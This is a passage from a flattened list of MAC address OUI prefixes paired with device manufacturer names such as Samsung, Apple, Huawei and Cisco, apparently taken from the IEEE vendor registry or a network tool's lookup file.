Sierra Wireless 1C3477 Innovation Wireless BC3E07 Hitron Technologies. Inc 48FDA3 Xiaomi Communications Co Ltd 001697 NEC Corporation 003013 NEC Corporation 049DFE Hivesystem 0CEC84 Shenzhen TINNO Mobile Technology Corp. 9CDB07 Thum+Mahr GmbH DCEB69 Technicolor CH USA Inc. 004E35 Hewlett Packard Enterprise F81308 Nokia F8A2D6 Liteon Technology Corporation 182A44 HIROSE ELECTRONIC SYSTEM FC94CE zte corporation 90869B zte corporation E0189F EM Microelectronic 74366D Vodafone Italia S.p.A. 84DB2F Sierra Wireless 9458CB Nintendo Co.,Ltd 28EC9A Texas Instruments FCBE7B vivo Mobile Communication Co., Ltd. B40FB3 vivo Mobile Communication Co., Ltd. EC5C68 CHONGQING FUGUI ELECTRONICS CO.,LTD. C4E506 Piper Networks, Inc. 30EB5A LANDIS + GYR F80F6F Cisco Systems, Inc 0080E3 CORAL NETWORK CORPORATION B4C62E Molex CMS B8259A Thalmic Labs 282536 SHENZHEN HOLATEK CO.,LTD B8A175 Roku, Inc. CCD3C1 Vestel Elektronik San ve Tic. A.Åž. 0CD0F8 Cisco Systems, Inc 745F90 LAM Technologies A42655 LTI Motion (Shanghai) Co., Ltd. 60A730 Shenzhen Yipinfang Internet Technology Co.,Ltd 3C9BD6 Vizio, Inc F85B9C SB SYSTEMS Co.,Ltd 6CA928 HMD Global Oy 00D861 Micro-Star INTL CO., LTD. 74C17D Infinix mobility limited 8871B1 ARRIS Group, Inc. F0AF85 ARRIS Group, Inc. FCAE34 ARRIS Group, Inc. DCDA80 New H3C Technologies Co., Ltd CC7286 Xi'an Fengyu Information Technology Co., Ltd. 64EEB7 Netcore Technology Inc 3881D7 Texas Instruments 1804ED Texas Instruments D43260 GoPro 50DB3F SHENZHEN GONGJIN ELECTRONICS CO.,LT 1081B4 Hunan Greatwall Galaxy Science and Technology Co.,Ltd. 004279 Sunitec Enterprise Co.,Ltd 00B8B3 Cisco Systems, Inc F4DD9E GoPro D4D919 GoPro 141114 TECNO MOBILE LIMITED A45046 Xiaomi Communications Co Ltd 1C24CD Askey Computer Corp. 007C2D Samsung Electronics Co.,Ltd B47748 Shenzhen Neoway Technology Co.,Ltd. F8501C Tianjin Geneuo Technology Co.,Ltd 44070B Google, Inc. F8C249 Private B831B5 Microsoft Corporation ECF6BD SNCF MOBILITÉS 38B4D3 BSH Hausgeraete GmbH C84782 Areson Technology Corp. E89363 Nokia 7C0CF6 Guangdong Huiwei High-tech Co., Ltd. 749D79 Sercomm Corporation. 00D6FE Cisco Systems, Inc 0CBF74 Morse Micro FC8F7D SHENZHEN GONGJIN ELECTRONICS CO.,LT 24BE18 DADOUTEK COMPANY LIMITED B41D2B Shenzhen YOUHUA Technology Co., Ltd 14C213 Apple, Inc. 70D313 HUAWEI TECHNOLOGIES CO.,LTD 9C1D36 HUAWEI TECHNOLOGIES CO.,LTD CCBBFE HUAWEI TECHNOLOGIES CO.,LTD A4D931 Apple, Inc. BCFED9 Apple, Inc. 808223 Apple, Inc. 300A60 IEEE Registration Authority 80D065 CKS Corporation 283166 vivo Mobile Communication Co., Ltd. C04004 Medicaroid Corporation 20AD56 Continental Automotive Systems Inc. 5029F5 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD CC08FB TP-LINK TECHNOLOGIES CO.,LTD. BCAF91 TE Connectivity Sensor Solutions F0D7DC Wesine (Wuhan) Technology Co., Ltd. 007204 Samsung Electronics Co., Ltd. ARTIK 40C81F Shenzhen Xinguodu Technology Co., Ltd. 1459C0 NETGEAR 8C61A3 ARRIS Group, Inc. A81087 Texas Instruments A02833 IEEE Registration Authority C8C2F5 FLEXTRONICS MANUFACTURING(ZHUHAI)CO.,LTD. F05849 CareView Communications 34E5EC Palo Alto Networks A4ED43 IEEE Registration Authority 94298D Shanghai AdaptComm Technology Co., Ltd. 00AA6E Cisco Systems, Inc 0C7C28 Nokia 6843D7 Agilecom Photonics Solutions Guangdong Limited 20D80B Juniper Networks 8C8F8B China Mobile Chongqing branch B86A97 Edgecore Networks Corporation 000A5E 3COM 00105A 3COM 006097 3COM 006008 3COM 001B6E Keysight Technologies, Inc. 00040B 3COM EUROPE LTD 000102 3COM 8CFE74 Ruckus Wireless A8016D Aiwa Corporation 0440A9 New H3C Technologies Co., Ltd 4C0143 eero inc. E43493 HUAWEI TECHNOLOGIES CO.,LTD 342912 HUAWEI TECHNOLOGIES CO.,LTD 604BAA Magic Leap, Inc. 4C364E Panasonic CorporationConnected Solutions Company BCA58B Samsung Electronics Co.,Ltd 80CEB9 Samsung Electronics Co.,Ltd D0D3FC Mios, Ltd. 6C6CD3 Cisco Systems, Inc E049ED Audeze LLC 8030E0 Hewlett Packard Enterprise E85D86 CHANG YOW TECHNOLOGIES INTERNATIONAL CO.,LTD. 143719 PT Prakarsa Visi Valutama 582F40 Nintendo Co.,Ltd 0890BA Danlaw Inc 94A3CA KonnectONE, LLC 244CE3 Amazon Technologies Inc. B8BEF4 devolo AG 000157 SYSWAVE CO., LTD 58FDBE Shenzhen Taikaida Technology Co., Ltd F4F197 EMTAKE Inc 6CED51 NEXCONTROL Co.,Ltd 04C3E6 IEEE Registration Authority 286336 Siemens AG 14D169 HUAWEI TECHNOLOGIES CO.,LTD 1062E5 Hewlett Packard 0020B5 YASKAWA ELECTRIC CORPORATION E06267 Xiaomi Communications Co Ltd 70B7AA vivo Mobile Communication Co., Ltd. 84B31B Kinexon GmbH 082525 Xiaomi Communications Co Ltd C49500 Amazon Technologies Inc. F460E2 Xiaomi Communications Co Ltd E4D124Mojo Networks, Inc. 0013A3 Siemens Home & Office Comm. Devices B0B867 Hewlett Packard Enterprise C00380 Juniper Networks 98BB99 Phicomm (Sichuan) Co.,Ltd. 002622 COMPAL INFORMATION (KUNSHAN) CO., LTD. F8272E Mercku 9CC950 Baumer Holding F89910 Integrated Device Technology (Malaysia) Sdn. Bhd. 50E0EF Nokia 848A8D Cisco Systems, Inc 1CC3EB GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 504C7E THE 41ST INSTITUTE OF CETC 001413 Trebing & Himstedt Prozeßautomation GmbH & Co. KG 000799 Tipping Point Technologies, Inc. D01CBB Beijing Ctimes Digital Technology Co., Ltd. 7487BB Ciena Corporation 68DD26 Shanghai Focus Vision Security Technology Co.,Ltd 2866E3 AzureWave Technology Inc. 60F18A HUAWEI TECHNOLOGIES CO.,LTD EC3873 Juniper Networks 780473 Texas Instruments A83E0E HMD Global Oy 10C172 HUAWEI TECHNOLOGIES CO.,LTD 00151E ETHERNET Powerlink Standarization Group (EPSG) 00111E ETHERNET Powerlink Standarization Group (EPSG) 00409D DigiBoard CC50E3 Espressif Inc. DCE305ZAO NPK Rotek A4DA32 Texas Instruments 000EEE Muco Industrie BV 7C1C4E LG Innotek D8B6B7 Comtrend Corporation 002106 RIM Testing Services 8C14B4 zte corporation 3C9872 Sercomm Corporation. 40C3C6 SnapRoute 5C9656 AzureWave Technology Inc. E06066 Sercomm Corporation. 149346 PNI sensor corporation DCE0EB Nanjing Aozheng Information Technology Co.Ltd EC8C9A HUAWEI TECHNOLOGIES CO.,LTD B48655 HUAWEI TECHNOLOGIES CO.,LTD 2C4759 Beijing MEGA preponderance Science & Technology Co. Ltd A41566 WEIFANG GOERTEK ELECTRONICS CO.,LTD 1C965A WEIFANG GOERTEK ELECTRONICS CO.,LTD 401B5F WEIFANG GOERTEK ELECTRONICS CO.,LTD A8E552 JUWEL Aquarium AG & Co. KG 5CCD7C MEIZU Technology Co.,Ltd. 00138A Qingdao GoerTek Technology Co., Ltd. A830AD WEIFANG GOERTEK ELECTRONICS CO.,LTD BC5FF6 MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. C8E7D8 MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 60D21C Sunnovo International Limited CC51B4 Integrated Device Technology (Malaysia) Sdn. Bhd. 00C3F4 Samsung Electronics Co.,Ltd B88AEC Nintendo Co.,Ltd D0D783 HUAWEI TECHNOLOGIES CO.,LTD AC3B77 Sagemcom Broadband SAS B0FC0D Amazon Technologies Inc. CCC92C Schindler - PORT Technology 001E39 Comsys Communication Ltd. 78725D Cisco Systems, Inc FCE66A Industrial Software Co 7836CC GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 8CCF5C BEFEGA GmbH 70C833 Wirepas Oy 0C73EB IEEE Registration Authority 048AE1 FLEXTRONICS MANUFACTURING(ZHUHAI)CO.,LTD. F0B5D1 Texas Instruments 00E000 FUJITSU LIMITED 90848B HDR10+ Technologies, LLC C8D779 QING DAO HAIER TELECOM CO.,LTD. 10B36F Bowei Technology Company Limited FC9BC6 Sumavision Technologies Co.,Ltd C8292A Barun Electronics E482CC Jumptronic GmbH 48605F LG Electronics (Mobile Communications) B0416F Shenzhen Maxtang Computer Co.,Ltd 501D93 HUAWEI TECHNOLOGIES CO.,LTD 2816A8 Microsoft Corporation F8F532 ARRIS Group, Inc. B083D6 ARRIS Group, Inc. 80C7C5 Fiberhome Telecommunication Technologies Co.,LTD E4434B Dell Inc. 0CF5A4 Cisco Systems, Inc 9C2EA1 Xiaomi Communications Co Ltd 089734 Hewlett Packard Enterprise F09CD7 Guangzhou Blue Cheetah Intelligent Technology Co., Ltd. BCE143 Apple, Inc. 647033 Apple, Inc. 846878 Apple, Inc. C8D083 Apple, Inc. 0C6ABC Fiberhome Telecommunication Technologies Co.,LTD 0080BA SPECIALIX (ASIA) PTE, LTD 480BB2 IEEE Registration Authority CCC079 Murata Manufacturing Co., Ltd. E019D8 BH TECHNOLOGIES 6030D4 Apple, Inc. F895EA Apple, Inc. 18F1D8 Apple, Inc. 3CCD5D HUAWEI TECHNOLOGIES CO.,LTD 7C7668 HUAWEI TECHNOLOGIES CO.,LTD 6C3838 Marking System Technology Co., Ltd. 30D9D9 Apple, Inc. 780F77 HangZhou Gubei Electronics Technology Co.,Ltd A438CC Nintendo Co.,Ltd 74721E Edison Labs Inc. 8C4CDC PLANEX COMMUNICATIONS INC. 5065F3 Hewlett Packard 3C9509 Liteon Technology Corporation BCAB7C TRnP KOREA Co Ltd 64CB5D SIA TeleSet 5821E9 TWPI C49F4C HUAWEI TECHNOLOGIES CO.,LTD 0C704A HUAWEI TECHNOLOGIES CO.,LTD F0E3DC Tecon MT, LLC A8DA01 Shenzhen NUOLIJIA Digital Technology Co.,Ltd 7C2586 Juniper Networks F041C8 IEEE Registration Authority CC9916 Integrated Device Technology (Malaysia) Sdn. Bhd. EC7FC6 ECCEL CORPORATION SAS 4CABFC zte corporation 0010D8 CALISTA 002194 Ping Communication 5C5AEA FORD 000B7B Test-Um Inc. 30FD38 Google, Inc. 001386 ABB Inc/Totalflow 003C10 Cisco Systems, Inc 54A65C Technicolor CH USA Inc. BCDDC2 Espressif Inc. 98D863 Shanghai High-Flying Electronics Technology Co., Ltd 0CF346 Xiaomi Communications Co Ltd 7CFF4D AVM Audiovisuelles Marketing und Computersysteme GmbH C88F26 Skyworth Digital Technology(Shenzhen) Co.,Ltd 703A73 Shenzhen Sundray Technologies Company Limited 10F9EB Industria Fueguina de Relojería Electrónica s.a. 80AD16 Xiaomi Communications Co Ltd 044EAF LG Innotek 1894C6 ShenZhen Chenyee Technology Co., Ltd. 40BD32 Texas Instruments CC8E71 Cisco Systems, Inc 38F554 HISENSE ELECTRIC CO.,LTD 88E90F innomdlelab 003074 EQUIINET LTD. EC9B8B Hewlett Packard Enterprise B0B3AD HUMAX Co., Ltd. 18A28A Essel-T Co., Ltd 20365B Megafone Limited E8DE00 ChongQing GuanFang Technology Co.,LTD 70C94E Liteon Technology Corporation 70D081 Beijing Netpower Technologies Inc. FC643A Samsung Electronics Co.,Ltd A8515B Samsung Electronics Co.,Ltd 54B7E5 Rayson Technology Co., Ltd. 946372 vivo Mobile Communication Co., Ltd. BC0FA7 Ouster F8C120 Xi'an Link-Science Technology Co.,Ltd F0C9D1 GD Midea Air-Conditioning Equipment Co.,Ltd. 347E5C Sonos, Inc. B4FBF9 HUAWEI TECHNOLOGIES CO.,LTD 506F77 HUAWEI TECHNOLOGIES CO.,LTD 0C41E9 HUAWEI TECHNOLOGIES CO.,LTD 3CE824 HUAWEI TECHNOLOGIES CO.,LTD 345A06 SHARP Corporation 001936 STERLITE OPTICAL TECHNOLOGIES LIMITED B89F09 Wistron Neweb Corporation 0402CA Shenzhen Vtsonic Co.,ltd 3CFB5C Fiberhome Telecommunication Technologies Co.,LTD 7440BB Hon Hai Precision Ind. Co.,Ltd. 1C1161 Ciena Corporation B4DE31 Cisco Systems, Inc A44027 zte corporation B4F7A1 LG Electronics (Mobile Communications) 28EDE0 AMPAK Technology, Inc. 88BD45 Samsung Electronics Co.,Ltd 54FCF0 Samsung Electronics Co.,Ltd 306A85 Samsung Electronics Co.,Ltd 4CDD31 Samsung Electronics Co.,Ltd 88B6EE Dish Technologies Corp 70F220 Actiontec Electronics, Inc D0817A Apple, Inc. 98CA33 Apple, Inc. 68AB1E Apple, Inc. 70EF00 Apple, Inc. C87765 Tiesse SpA 2C37C5 Qingdao Haier Intelligent Home Appliance Technology Co.,Ltd CC40D0 NETGEAR 7C7630 Shenzhen YOUHUA Technology Co., Ltd 9822EF Liteon Technology Corporation 788038 FUNAI ELECTRIC CO., LTD. BCFFEB Motorola Mobility LLC, a Lenovo Company 000130 Extreme Networks, Inc. FC0A81 Extreme Networks, Inc. F045DA Texas Instruments B80716 vivo Mobile Communication Co., Ltd. A8EEC6 Muuselabs NV/SA E4F042 Google, Inc. 4048FD IEEE Registration Authority 20B399 Enterasys CC2D21 Tenda Technology Co.,Ltd.Dongguan branch 004097 DATEX DIVISION OF 9C4FCF TCT mobile ltd D896E0 Alibaba Cloud Computing Ltd. 001862 Seagate Technology 1CEEC9 Elo touch solutions 000C50 Seagate Technology 342AF1 Texas Instruments 207852 Nokia C8DEC9 Coriant 44D5A5 AddOn Computer 38F73D Amazon Technologies Inc. C0A00D ARRIS Group, Inc. 0C6111 Anda Technologies SAC 0022C4 epro GmbH 1C330E PernixData B8F74A RCNTEC 645106 Hewlett Packard 0C1539 Apple, Inc. 6C5697 Amazon Technologies Inc. 0005FF SNS Solutions, Inc. F87B20 Cisco Systems, Inc E0AADB Nanjing PANENG Technology Development Co.,Ltd ECF451 Arcadyan Corporation 581243 AcSiP Technology Corp. A89FEC ARRIS Group, Inc. 00BE9E Fiberhome Telecommunication Technologies Co.,LTD 54C57A Sunnovo International Limited 58C17A Cambium Networks Limited 38019F SHENZHEN FAST TECHNOLOGIES CO.,LTD 245CCB AXIe Consortium, Inc. 609BC8 Hipad Intelligent Technology Co., Ltd. 406A8E Hangzhou Puwell OE Tech Ltd. 1C0FAF Lucid Vision Labs 88B4A6 Motorola Mobility LLC, a Lenovo Company 28CF08 ESSYS 002128 Oracle Corporation 001C73 Arista Networks 2C8A72 HTC Corporation 38AD8E New H3C Technologies Co., Ltd 34D0B8 IEEE Registration Authority D06726 Hewlett Packard Enterprise ECFAF4 SenRa Tech Pvt. Ltd D88F76 Apple, Inc. 409C28 Apple, Inc. 5CA176 SICHUAN TIANYI COMHEART TELECOMCO., LTD 583879 RICOH COMPANY, LTD. F44C70 Skyworth Digital Technology(Shenzhen) Co.,Ltd C8E7F0 Juniper Networks B0935B ARRIS Group, Inc. F449EF EMSTONE 54DF24 Fiberhome Telecommunication Technologies Co.,LTD AC1DDF IEEE Registration Authority E8D819 AzureWave Technology Inc. 782D7E TRENDnet, Inc. 741AE0 IEEE Registration Authority 24B209 Avaya Inc FC65DE Amazon Technologies Inc. B06EBF ASUSTek COMPUTER INC. 603D26 Technicolor CH USA Inc. BC903A Robert Bosch GmbH D0B128 Samsung Electronics Co.,Ltd BC5451 Samsung Electronics Co.,Ltd 74860B Cisco Systems, Inc 182D98 Jinwoo Industrial system D8A534 Spectronix Corporation EC51BC GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD F079E8 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 78321B D-Link International 601803 Daikin Air-conditioning (Shanghai) Co., Ltd. 00A096 MITSUMI ELECTRIC CO.,LTD. 78617C MITSUMI ELECTRIC CO.,LTD. 940E6B HUAWEI TECHNOLOGIES CO.,LTD 64FB50 RoomReady/Zdi, Inc. 74EAC8 New H3C Technologies Co., Ltd B4D64E Caldero Limited F89DBB Tintri D8A01D Espressif Inc. C4F312 Texas Instruments 904E91 IEEE Registration Authority 5CE8B7 Oraimo Technology Limited 3C11B2 Fraunhofer FIT 104B46 Mitsubishi Electric Corporation DC0C2D WEIFANG GOERTEK ELECTRONICS CO.,LTD D067E5 Dell Inc. 8CFEB4 VSOONTECH ELECTRONICS CO., LIMITED CC66B2 Nokia 9C65EE DASAN Network Solutions 78CA04 Nokia Corporation 34298F IEEE Registration Authority 5CEA1D Hon Hai Precision Ind. Co.,Ltd. 181456 Nokia Corporation 0017C8 KYOCERA Display Corporation 38E2DD zte corporation 885DFB zte corporation 58B42D YSTen Technology Co.,Ltd E048D3 MOBIWIRE MOBILES (NINGBO) CO.,LTD 58E28F Apple, Inc. 787B8A Apple, Inc. 4C16FC Juniper Networks 48BCA6 ​ASUNG TECHNO CO.,Ltd B009DA Ring Solutions 00054F Garmin International 005C86 SHENZHEN FAST TECHNOLOGIES CO.,LTD 30053F JTI Co.,Ltd. B8DB1C Integrated Device Technology (Malaysia) Sdn. Bhd. 3C10E6 PHAZR Inc. 904506 Tokyo Boeki Medisys Inc. 0021A1 Cisco Systems, Inc FCB698 Cambridge Industries(Group) Co.,Ltd. 0001CD ARtem 5C546D HUAWEI TECHNOLOGIES CO.,LTD 84A1D1 Sagemcom Broadband SAS 909D7D ARRIS Group, Inc. 788C4D Indyme Solutions, LLC 78BC1A Cisco Systems, Inc 000E59 Sagemcom Broadband SAS 101D51 8Mesh Networks Limited DCEB53 Wuhan QianXiao Elecronic Technology CO.,LTD EC8AC7 Fiberhome Telecommunication Technologies Co.,LTD 88365F LG Electronics (Mobile Communications) 288CB8 zte corporation FC7F56 CoSyst Control Systems GmbH 2C4053 Samsung Electronics Co.,Ltd 0C8FFF HUAWEI TECHNOLOGIES CO.,LTD 54B121 HUAWEI TECHNOLOGIES CO.,LTD 788102 Sercomm Corporation. 84AA9C MitraStar Technology Corp. F0EFD2 TF PAYMENT SERVICE CO., LTD 24B2DE Espressif Inc. F4939F Hon Hai Precision Ind. Co., Ltd. 000726 SHENZHEN GONGJIN ELECTRONICS CO.,LT FC8B97 SHENZHEN GONGJIN ELECTRONICS CO.,LT 2CAB25 SHENZHEN GONGJIN ELECTRONICS CO.,LT 1CA532 SHENZHEN GONGJIN ELECTRONICS CO.,LT 001F92 Avigilon Corporation 000C03 HDMI Licensing, LLC 7CBACC IEEE Registration Authority 94F128 Hewlett Packard Enterprise 101B54 HUAWEI TECHNOLOGIES CO.,LTD A80C63 HUAWEI TECHNOLOGIES CO.,LTD 5CC307 HUAWEI TECHNOLOGIES CO.,LTD E0107F Ruckus Wireless C4017C Ruckus Wireless 04FA3F Opticore Inc. 540237 Teltronic AG 4CB008 Shenzhen Gwelltimes Technology Co.,Ltd E86FF2 Actiontec Electronics, Inc 005018 AMIT, Inc. 70DEF9 FAI WAH INTERNATIONAL (HONG KONG) LIMITED B0EABC ASKEY COMPUTER CORP 94C691 EliteGroup Computer Systems Co., LTD 3CF591 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 602101 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 7CEB7F Dmet Products Corp. 8C8580 Smart Innovation LLC 404229 Layer3TV, Inc FC2F6B Everspin Technologies, Inc. 287B09 zte corporation 0025C4 Ruckus Wireless C0C520 Ruckus Wireless 78B28D Beijing Tengling Technology CO.Ltd A88038 ShenZhen MovingComm Technology Co., Limited F81D90 Solidwintech A06A44 Vizio, Inc DCBE7A Zhejiang Nurotron Biotechnology Co. 3438B7 HUMAX Co., Ltd. CC0677 Fiberhome Telecommunication Technologies Co.,LTD 784501 Biamp Systems 309C23 Micro-Star INTL CO., LTD. 54D751 Proximus 14780B Varex Imaging Deutschland AG ACAFB9 Samsung Electronics Co.,Ltd 88B111 Intel Corporate 8C395C Bit4id Srl D4258B Intel Corporate 041B6D LG Electronics (Mobile Communications) F44156 Arrikto Inc. 0080C2 IEEE 802.1 Working Group 688DB6 AETEK INC. ECF342 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 50FF20 Keenetic Limited E45740 ARRIS Group, Inc. F894C2 Intel Corporate 70D379 Cisco Systems, Inc 00F82C Cisco Systems, Inc 00C1B1 Cisco Systems, Inc F4FCB1 JJ Corp D8C8E9 Phicomm (Shanghai) Co., Ltd. 7CB960 Shanghai X-Cheng telecom LTD B03D96 Vision Valley FZ LLC 986C5C Jiangxi Gosun Guard Security Co.,Ltd 24792A Ruckus Wireless 30D386 zte corporation 70DB98 Cisco Systems, Inc B42A0E Technicolor CH USA Inc. 9CC8AE Becton, Dickinsonand Company B0359F Intel Corporate C0D962 ASKEY COMPUTER CORP F80BCB Cisco Systems, Inc 50D37F Yu Fly Mikly Way Science and Technology Co., Ltd. 181212 Cepton Technologies 70D923 vivo Mobile Communication Co., Ltd. B83A08 Tenda Technology Co.,Ltd.Dongguan branch 28B448 HUAWEI TECHNOLOGIES CO.,LTD 100501 PEGATRON CORPORATION 2CFAA2 Alcatel-Lucent Enterprise A49BF5 Hybridserver Tec GmbH 503DA1 Samsung Electronics Co.,Ltd F097E5 TAMIO, INC 4C1A3D GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 08028E NETGEAR E8E732 Alcatel-Lucent Enterprise B47C9C Amazon Technologies Inc. F4A739 Juniper Networks F470AB vivo Mobile Communication Co., Ltd. 2C5A0F Cisco Systems, Inc 2C3124 Cisco Systems, Inc 503237 Apple, Inc. B0481A Apple, Inc. B49CDF Apple, Inc. 48BF6B Apple, Inc. 2C1DB8 ARRIS Group, Inc. 58821D H. Schomäcker GmbH D8A105 Syslane, Co., Ltd. BCA042 SHANGHAI FLYCO ELECTRICAL APPLIANCE CO.,LTD 3C0518 Samsung Electronics Co.,Ltd 900628 Samsung Electronics Co.,Ltd B4A9FE GHIA Technology (Shenzhen) LTD 08B258 Juniper Networks 9C84BF Apple, Inc. 1CA0D3 IEEE Registration Authority 9CFCD1 Aetheris Technology (Shanghai) Co., Ltd. CCCE1E AVM Audiovisuelles Marketing und Computersysteme GmbH 0CF4D5 Ruckus Wireless 7C2664 Sagemcom Broadband SAS AC6B0F CADENCE DESIGN SYSTEMS INC C8B5AD Hewlett Packard Enterprise 7C3866 Texas Instruments 0C61CF Texas Instruments 9C1D58 Texas Instruments 3805AC Piller Group GmbH 346E9D Ericsson AB 6854C1 ColorTokens, Inc. 00111B Targa Systems Div L-3 Communications 6C750D WiFiSONG BC3F8F HUAWEI TECHNOLOGIES CO.,LTD 143004 HUAWEI TECHNOLOGIES CO.,LTD F4DC41 YOUNGZONE CULTURE (SHANGHAI) CORP C4836F Ciena Corporation 7CC6C4 Kolff Computer Supplies b.v. 000F4F PCS Systemtechnik GmbH A80CCA Shenzhen Sundray Technologies Company Limited 38AA3C SAMSUNG ELECTRO MECHANICS CO., LTD. 000302 Charles Industries, Ltd. 50A4D0 IEEE Registration Authority 800010 AT&T 0024F1 Shenzhen Fanhai Sanjiang Electronics Co., Ltd. 142FFD LT SECURITY INC 0C3CCD Universal Global Scientific Industrial Co., Ltd. 14ABC5 Intel Corporate 50D213 CviLux Corporation 001E29 Hypertherm Inc 5004B8 HUAWEI TECHNOLOGIES CO.,LTD 00D0B2 Xiotech Corporation 5CFF35 Wistron Corporation CC9F7A Chiun Mai Communication Systems, Inc 78F29E PEGATRON CORPORATION 64777D Hitron Technologies. Inc 9C50EE Cambridge Industries(Group) Co.,Ltd. 40ED98 IEEE Registration Authority C891F9 Sagemcom Broadband SAS ACDCE5 Procter & Gamble Company 00B362 Apple, Inc. E4E4AB Apple, Inc. 60D262 Tzukuri Pty Ltd 8404D2 Kirale Technologies SL 54FA96 Nokia 60334B Apple, Inc. 38AFD7 FUJITSU LIMITED 28993A Arista Networks 64EB8C Seiko Epson Corporation F48C50 Intel Corporate DCD255 Kinpo Electronics, Inc. A02C36 FN-LINK TECHNOLOGY LIMITED 000320 Xpeed, Inc. 508A0F SHENZHEN FISE TECHNOLOGY HOLDING CO.,LTD. 7CCBE2 IEEE Registration Authority A8A5E2 MSF-Vathauer Antriebstechnik GmbH & Co KG BCA8A6 Intel Corporate 74FF4C Skyworth Digital Technology(Shenzhen) Co.,Ltd 68AF13 Futura Mobility 681AB2 zte corporation E04FBD SICHUAN TIANYI COMHEART TELECOMCO.,LTD 7CEBAE Ridgeline Instruments E0508B Zhejiang Dahua Technology Co., Ltd. 9C1E95 Actiontec Electronics, Inc 60427F SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD E89EB4 Hon Hai Precision Ind. Co.,Ltd. D46A6A Hon Hai Precision Ind. Co.,Ltd. 98FD74 ACT.CO.LTD 64DB43 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 000E58 Sonos, Inc. 002590 Super Micro Computer, Inc. AC1F6B Super Micro Computer, Inc. 000B2E Cal-Comp Electronics & Communications Company Ltd. 4865EE IEEE Registration Authority D0F73B Helmut Mauell GmbH Werk Weida 180675 Dilax Intelcom GmbH 000FC2 Uniwell Corporation 6CEC5A Hon Hai Precision Ind. CO.,Ltd. 44C346 HUAWEI TECHNOLOGIES CO.,LTD 307496 HUAWEI TECHNOLOGIES CO.,LTD 708A09 HUAWEI TECHNOLOGIES CO.,LTD CCC5EF Co-Comm Servicios Telecomunicaciones S.L. 9002A9 Zhejiang Dahua Technology Co., Ltd. C0288D Logitech, Inc 0C4933 Sichuan Jiuzhou Electronic Technology Co., Ltd. 000064 Yokogawa Digital Computer Corporation 506B8D Nutanix 0038DF Cisco Systems, Inc F4CAE5 FREEBOX SAS 90004E Hon Hai Precision Ind. Co.,Ltd. 7C2634 ARRIS Group, Inc. 40F413 Rubezh C8D3FF Hewlett Packard C4BE84 Texas Instruments F4F524 Motorola Mobility LLC, a Lenovo Company 00BBC1 CANON INC. 24C1BD CRRC DALIAN R&D CO.,LTD. 00A2EE Cisco Systems, Inc 0059DC Cisco Systems, Inc 00FD45 Hewlett Packard Enterprise 5098F3 Rheem Australia Pty Ltd B4D135 Cloudistics 0013A5 General Solutions, LTD. 9C3DCF NETGEAR 248894 shenzhen lensun Communication Technology LTD B04BBF PT HAN SUNG ELECTORONICS INDONESIA CC2D83 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D46E0E TP-LINK TECHNOLOGIES CO.,LTD. 88366C EFM Networks 48DA96 Eddy Smart Home Solutions Inc. F074E4 Thundercomm Technology Co., Ltd A0722C HUMAX Co., Ltd. FCD848 Apple, Inc. EC107B Samsung Electronics Co.,Ltd 1C232C Samsung Electronics Co.,Ltd E00DB9 Cree, Inc. DC0D30 Shenzhen Feasycom Technology Co., Ltd. F0ACD7 IEEE Registration Authority 9495A0 Google, Inc. 00A6CA Cisco Systems, Inc 38D547 ASUSTek COMPUTER INC. FC83C6 N-Radio Technologies Co., Ltd. 30B64F Juniper Networks 1C9D3E Integrated Device Technology (Malaysia) Sdn. Bhd. F02FA7 HUAWEI TECHNOLOGIES CO.,LTD 18DED7 HUAWEI TECHNOLOGIES CO.,LTD C83DD4 CyberTAN Technology Inc. E0B94D SHENZHEN BILIAN ELECTRONIC CO.,LTD D8452B Integrated Device Technology (Malaysia) Sdn. Bhd. E4186B Zyxel Communications Corporation 008731 Cisco Systems, Inc 88DEA9 Roku, Inc. 78888A CDR Sp. z o.o. Sp. k. 0021D1 Samsung Electronics Co.,Ltd 001FCC Samsung Electronics Co.,Ltd A42983 Boeing Defence Australia EC8892 Motorola Mobility LLC, a Lenovo Company 7487A9 OCT Technology Co., Ltd. 004A77 zte corporation A41437 Hangzhou Hikvision Digital Technology Co.,Ltd. 60A10A Samsung Electronics Co.,Ltd 8C71F8 Samsung Electronics Co.,Ltd CC051B Samsung Electronics Co.,Ltd 8C7712 Samsung Electronics Co.,Ltd 9463D1 Samsung Electronics Co.,Ltd 0021D2 Samsung Electronics Co.,Ltd 5C497D Samsung Electronics Co.,Ltd 98234E Micromedia AG 503F98 CMITECH 782079 ID Tech 0C6076 Hon Hai Precision Ind. Co.,Ltd. 0CEEE6 Hon Hai Precision Ind. Co.,Ltd. E4D53D Hon Hai Precision Ind. Co.,Ltd. C0143D Hon Hai Precision Ind. Co.,Ltd. C01885 Hon Hai Precision Ind. Co.,Ltd. 00749C Ruijie Networks Co.,LTD 5894CF Vertex Standard LMR, Inc. 20F85E Delta Electronics 7825AD Samsung Electronics Co.,Ltd ECE09B Samsung Electronics Co.,Ltd 0023E4 IPnect co. ltd. 70D4F2 RIM 78D6F0 SAMSUNG ELECTRO MECHANICS CO., LTD. BC20A4 Samsung Electronics Co.,Ltd 08D42B Samsung Electronics Co.,Ltd 789ED0 Samsung Electronics Co.,Ltd B0C4E7 Samsung Electronics Co.,Ltd A00798 Samsung Electronics Co.,Ltd 001FCD Samsung Electronics Co.,Ltd 38ECE4 Samsung Electronics Co.,Ltd 945103 Samsung Electronics Co.,Ltd 002490 Samsung Electronics Co.,Ltd 0023D7 Samsung Electronics Co.,Ltd 549B12 Samsung Electronics Co.,Ltd FCA13E Samsung Electronics Co.,Ltd 24C696 Samsung Electronics Co.,Ltd 94D771 Samsung Electronics Co.,Ltd E84E84 Samsung Electronics Co.,Ltd 001632 Samsung Electronics Co.,Ltd E4E0C5 Samsung Electronics Co.,Ltd C81479 Samsung Electronics Co.,Ltd 1CAF05 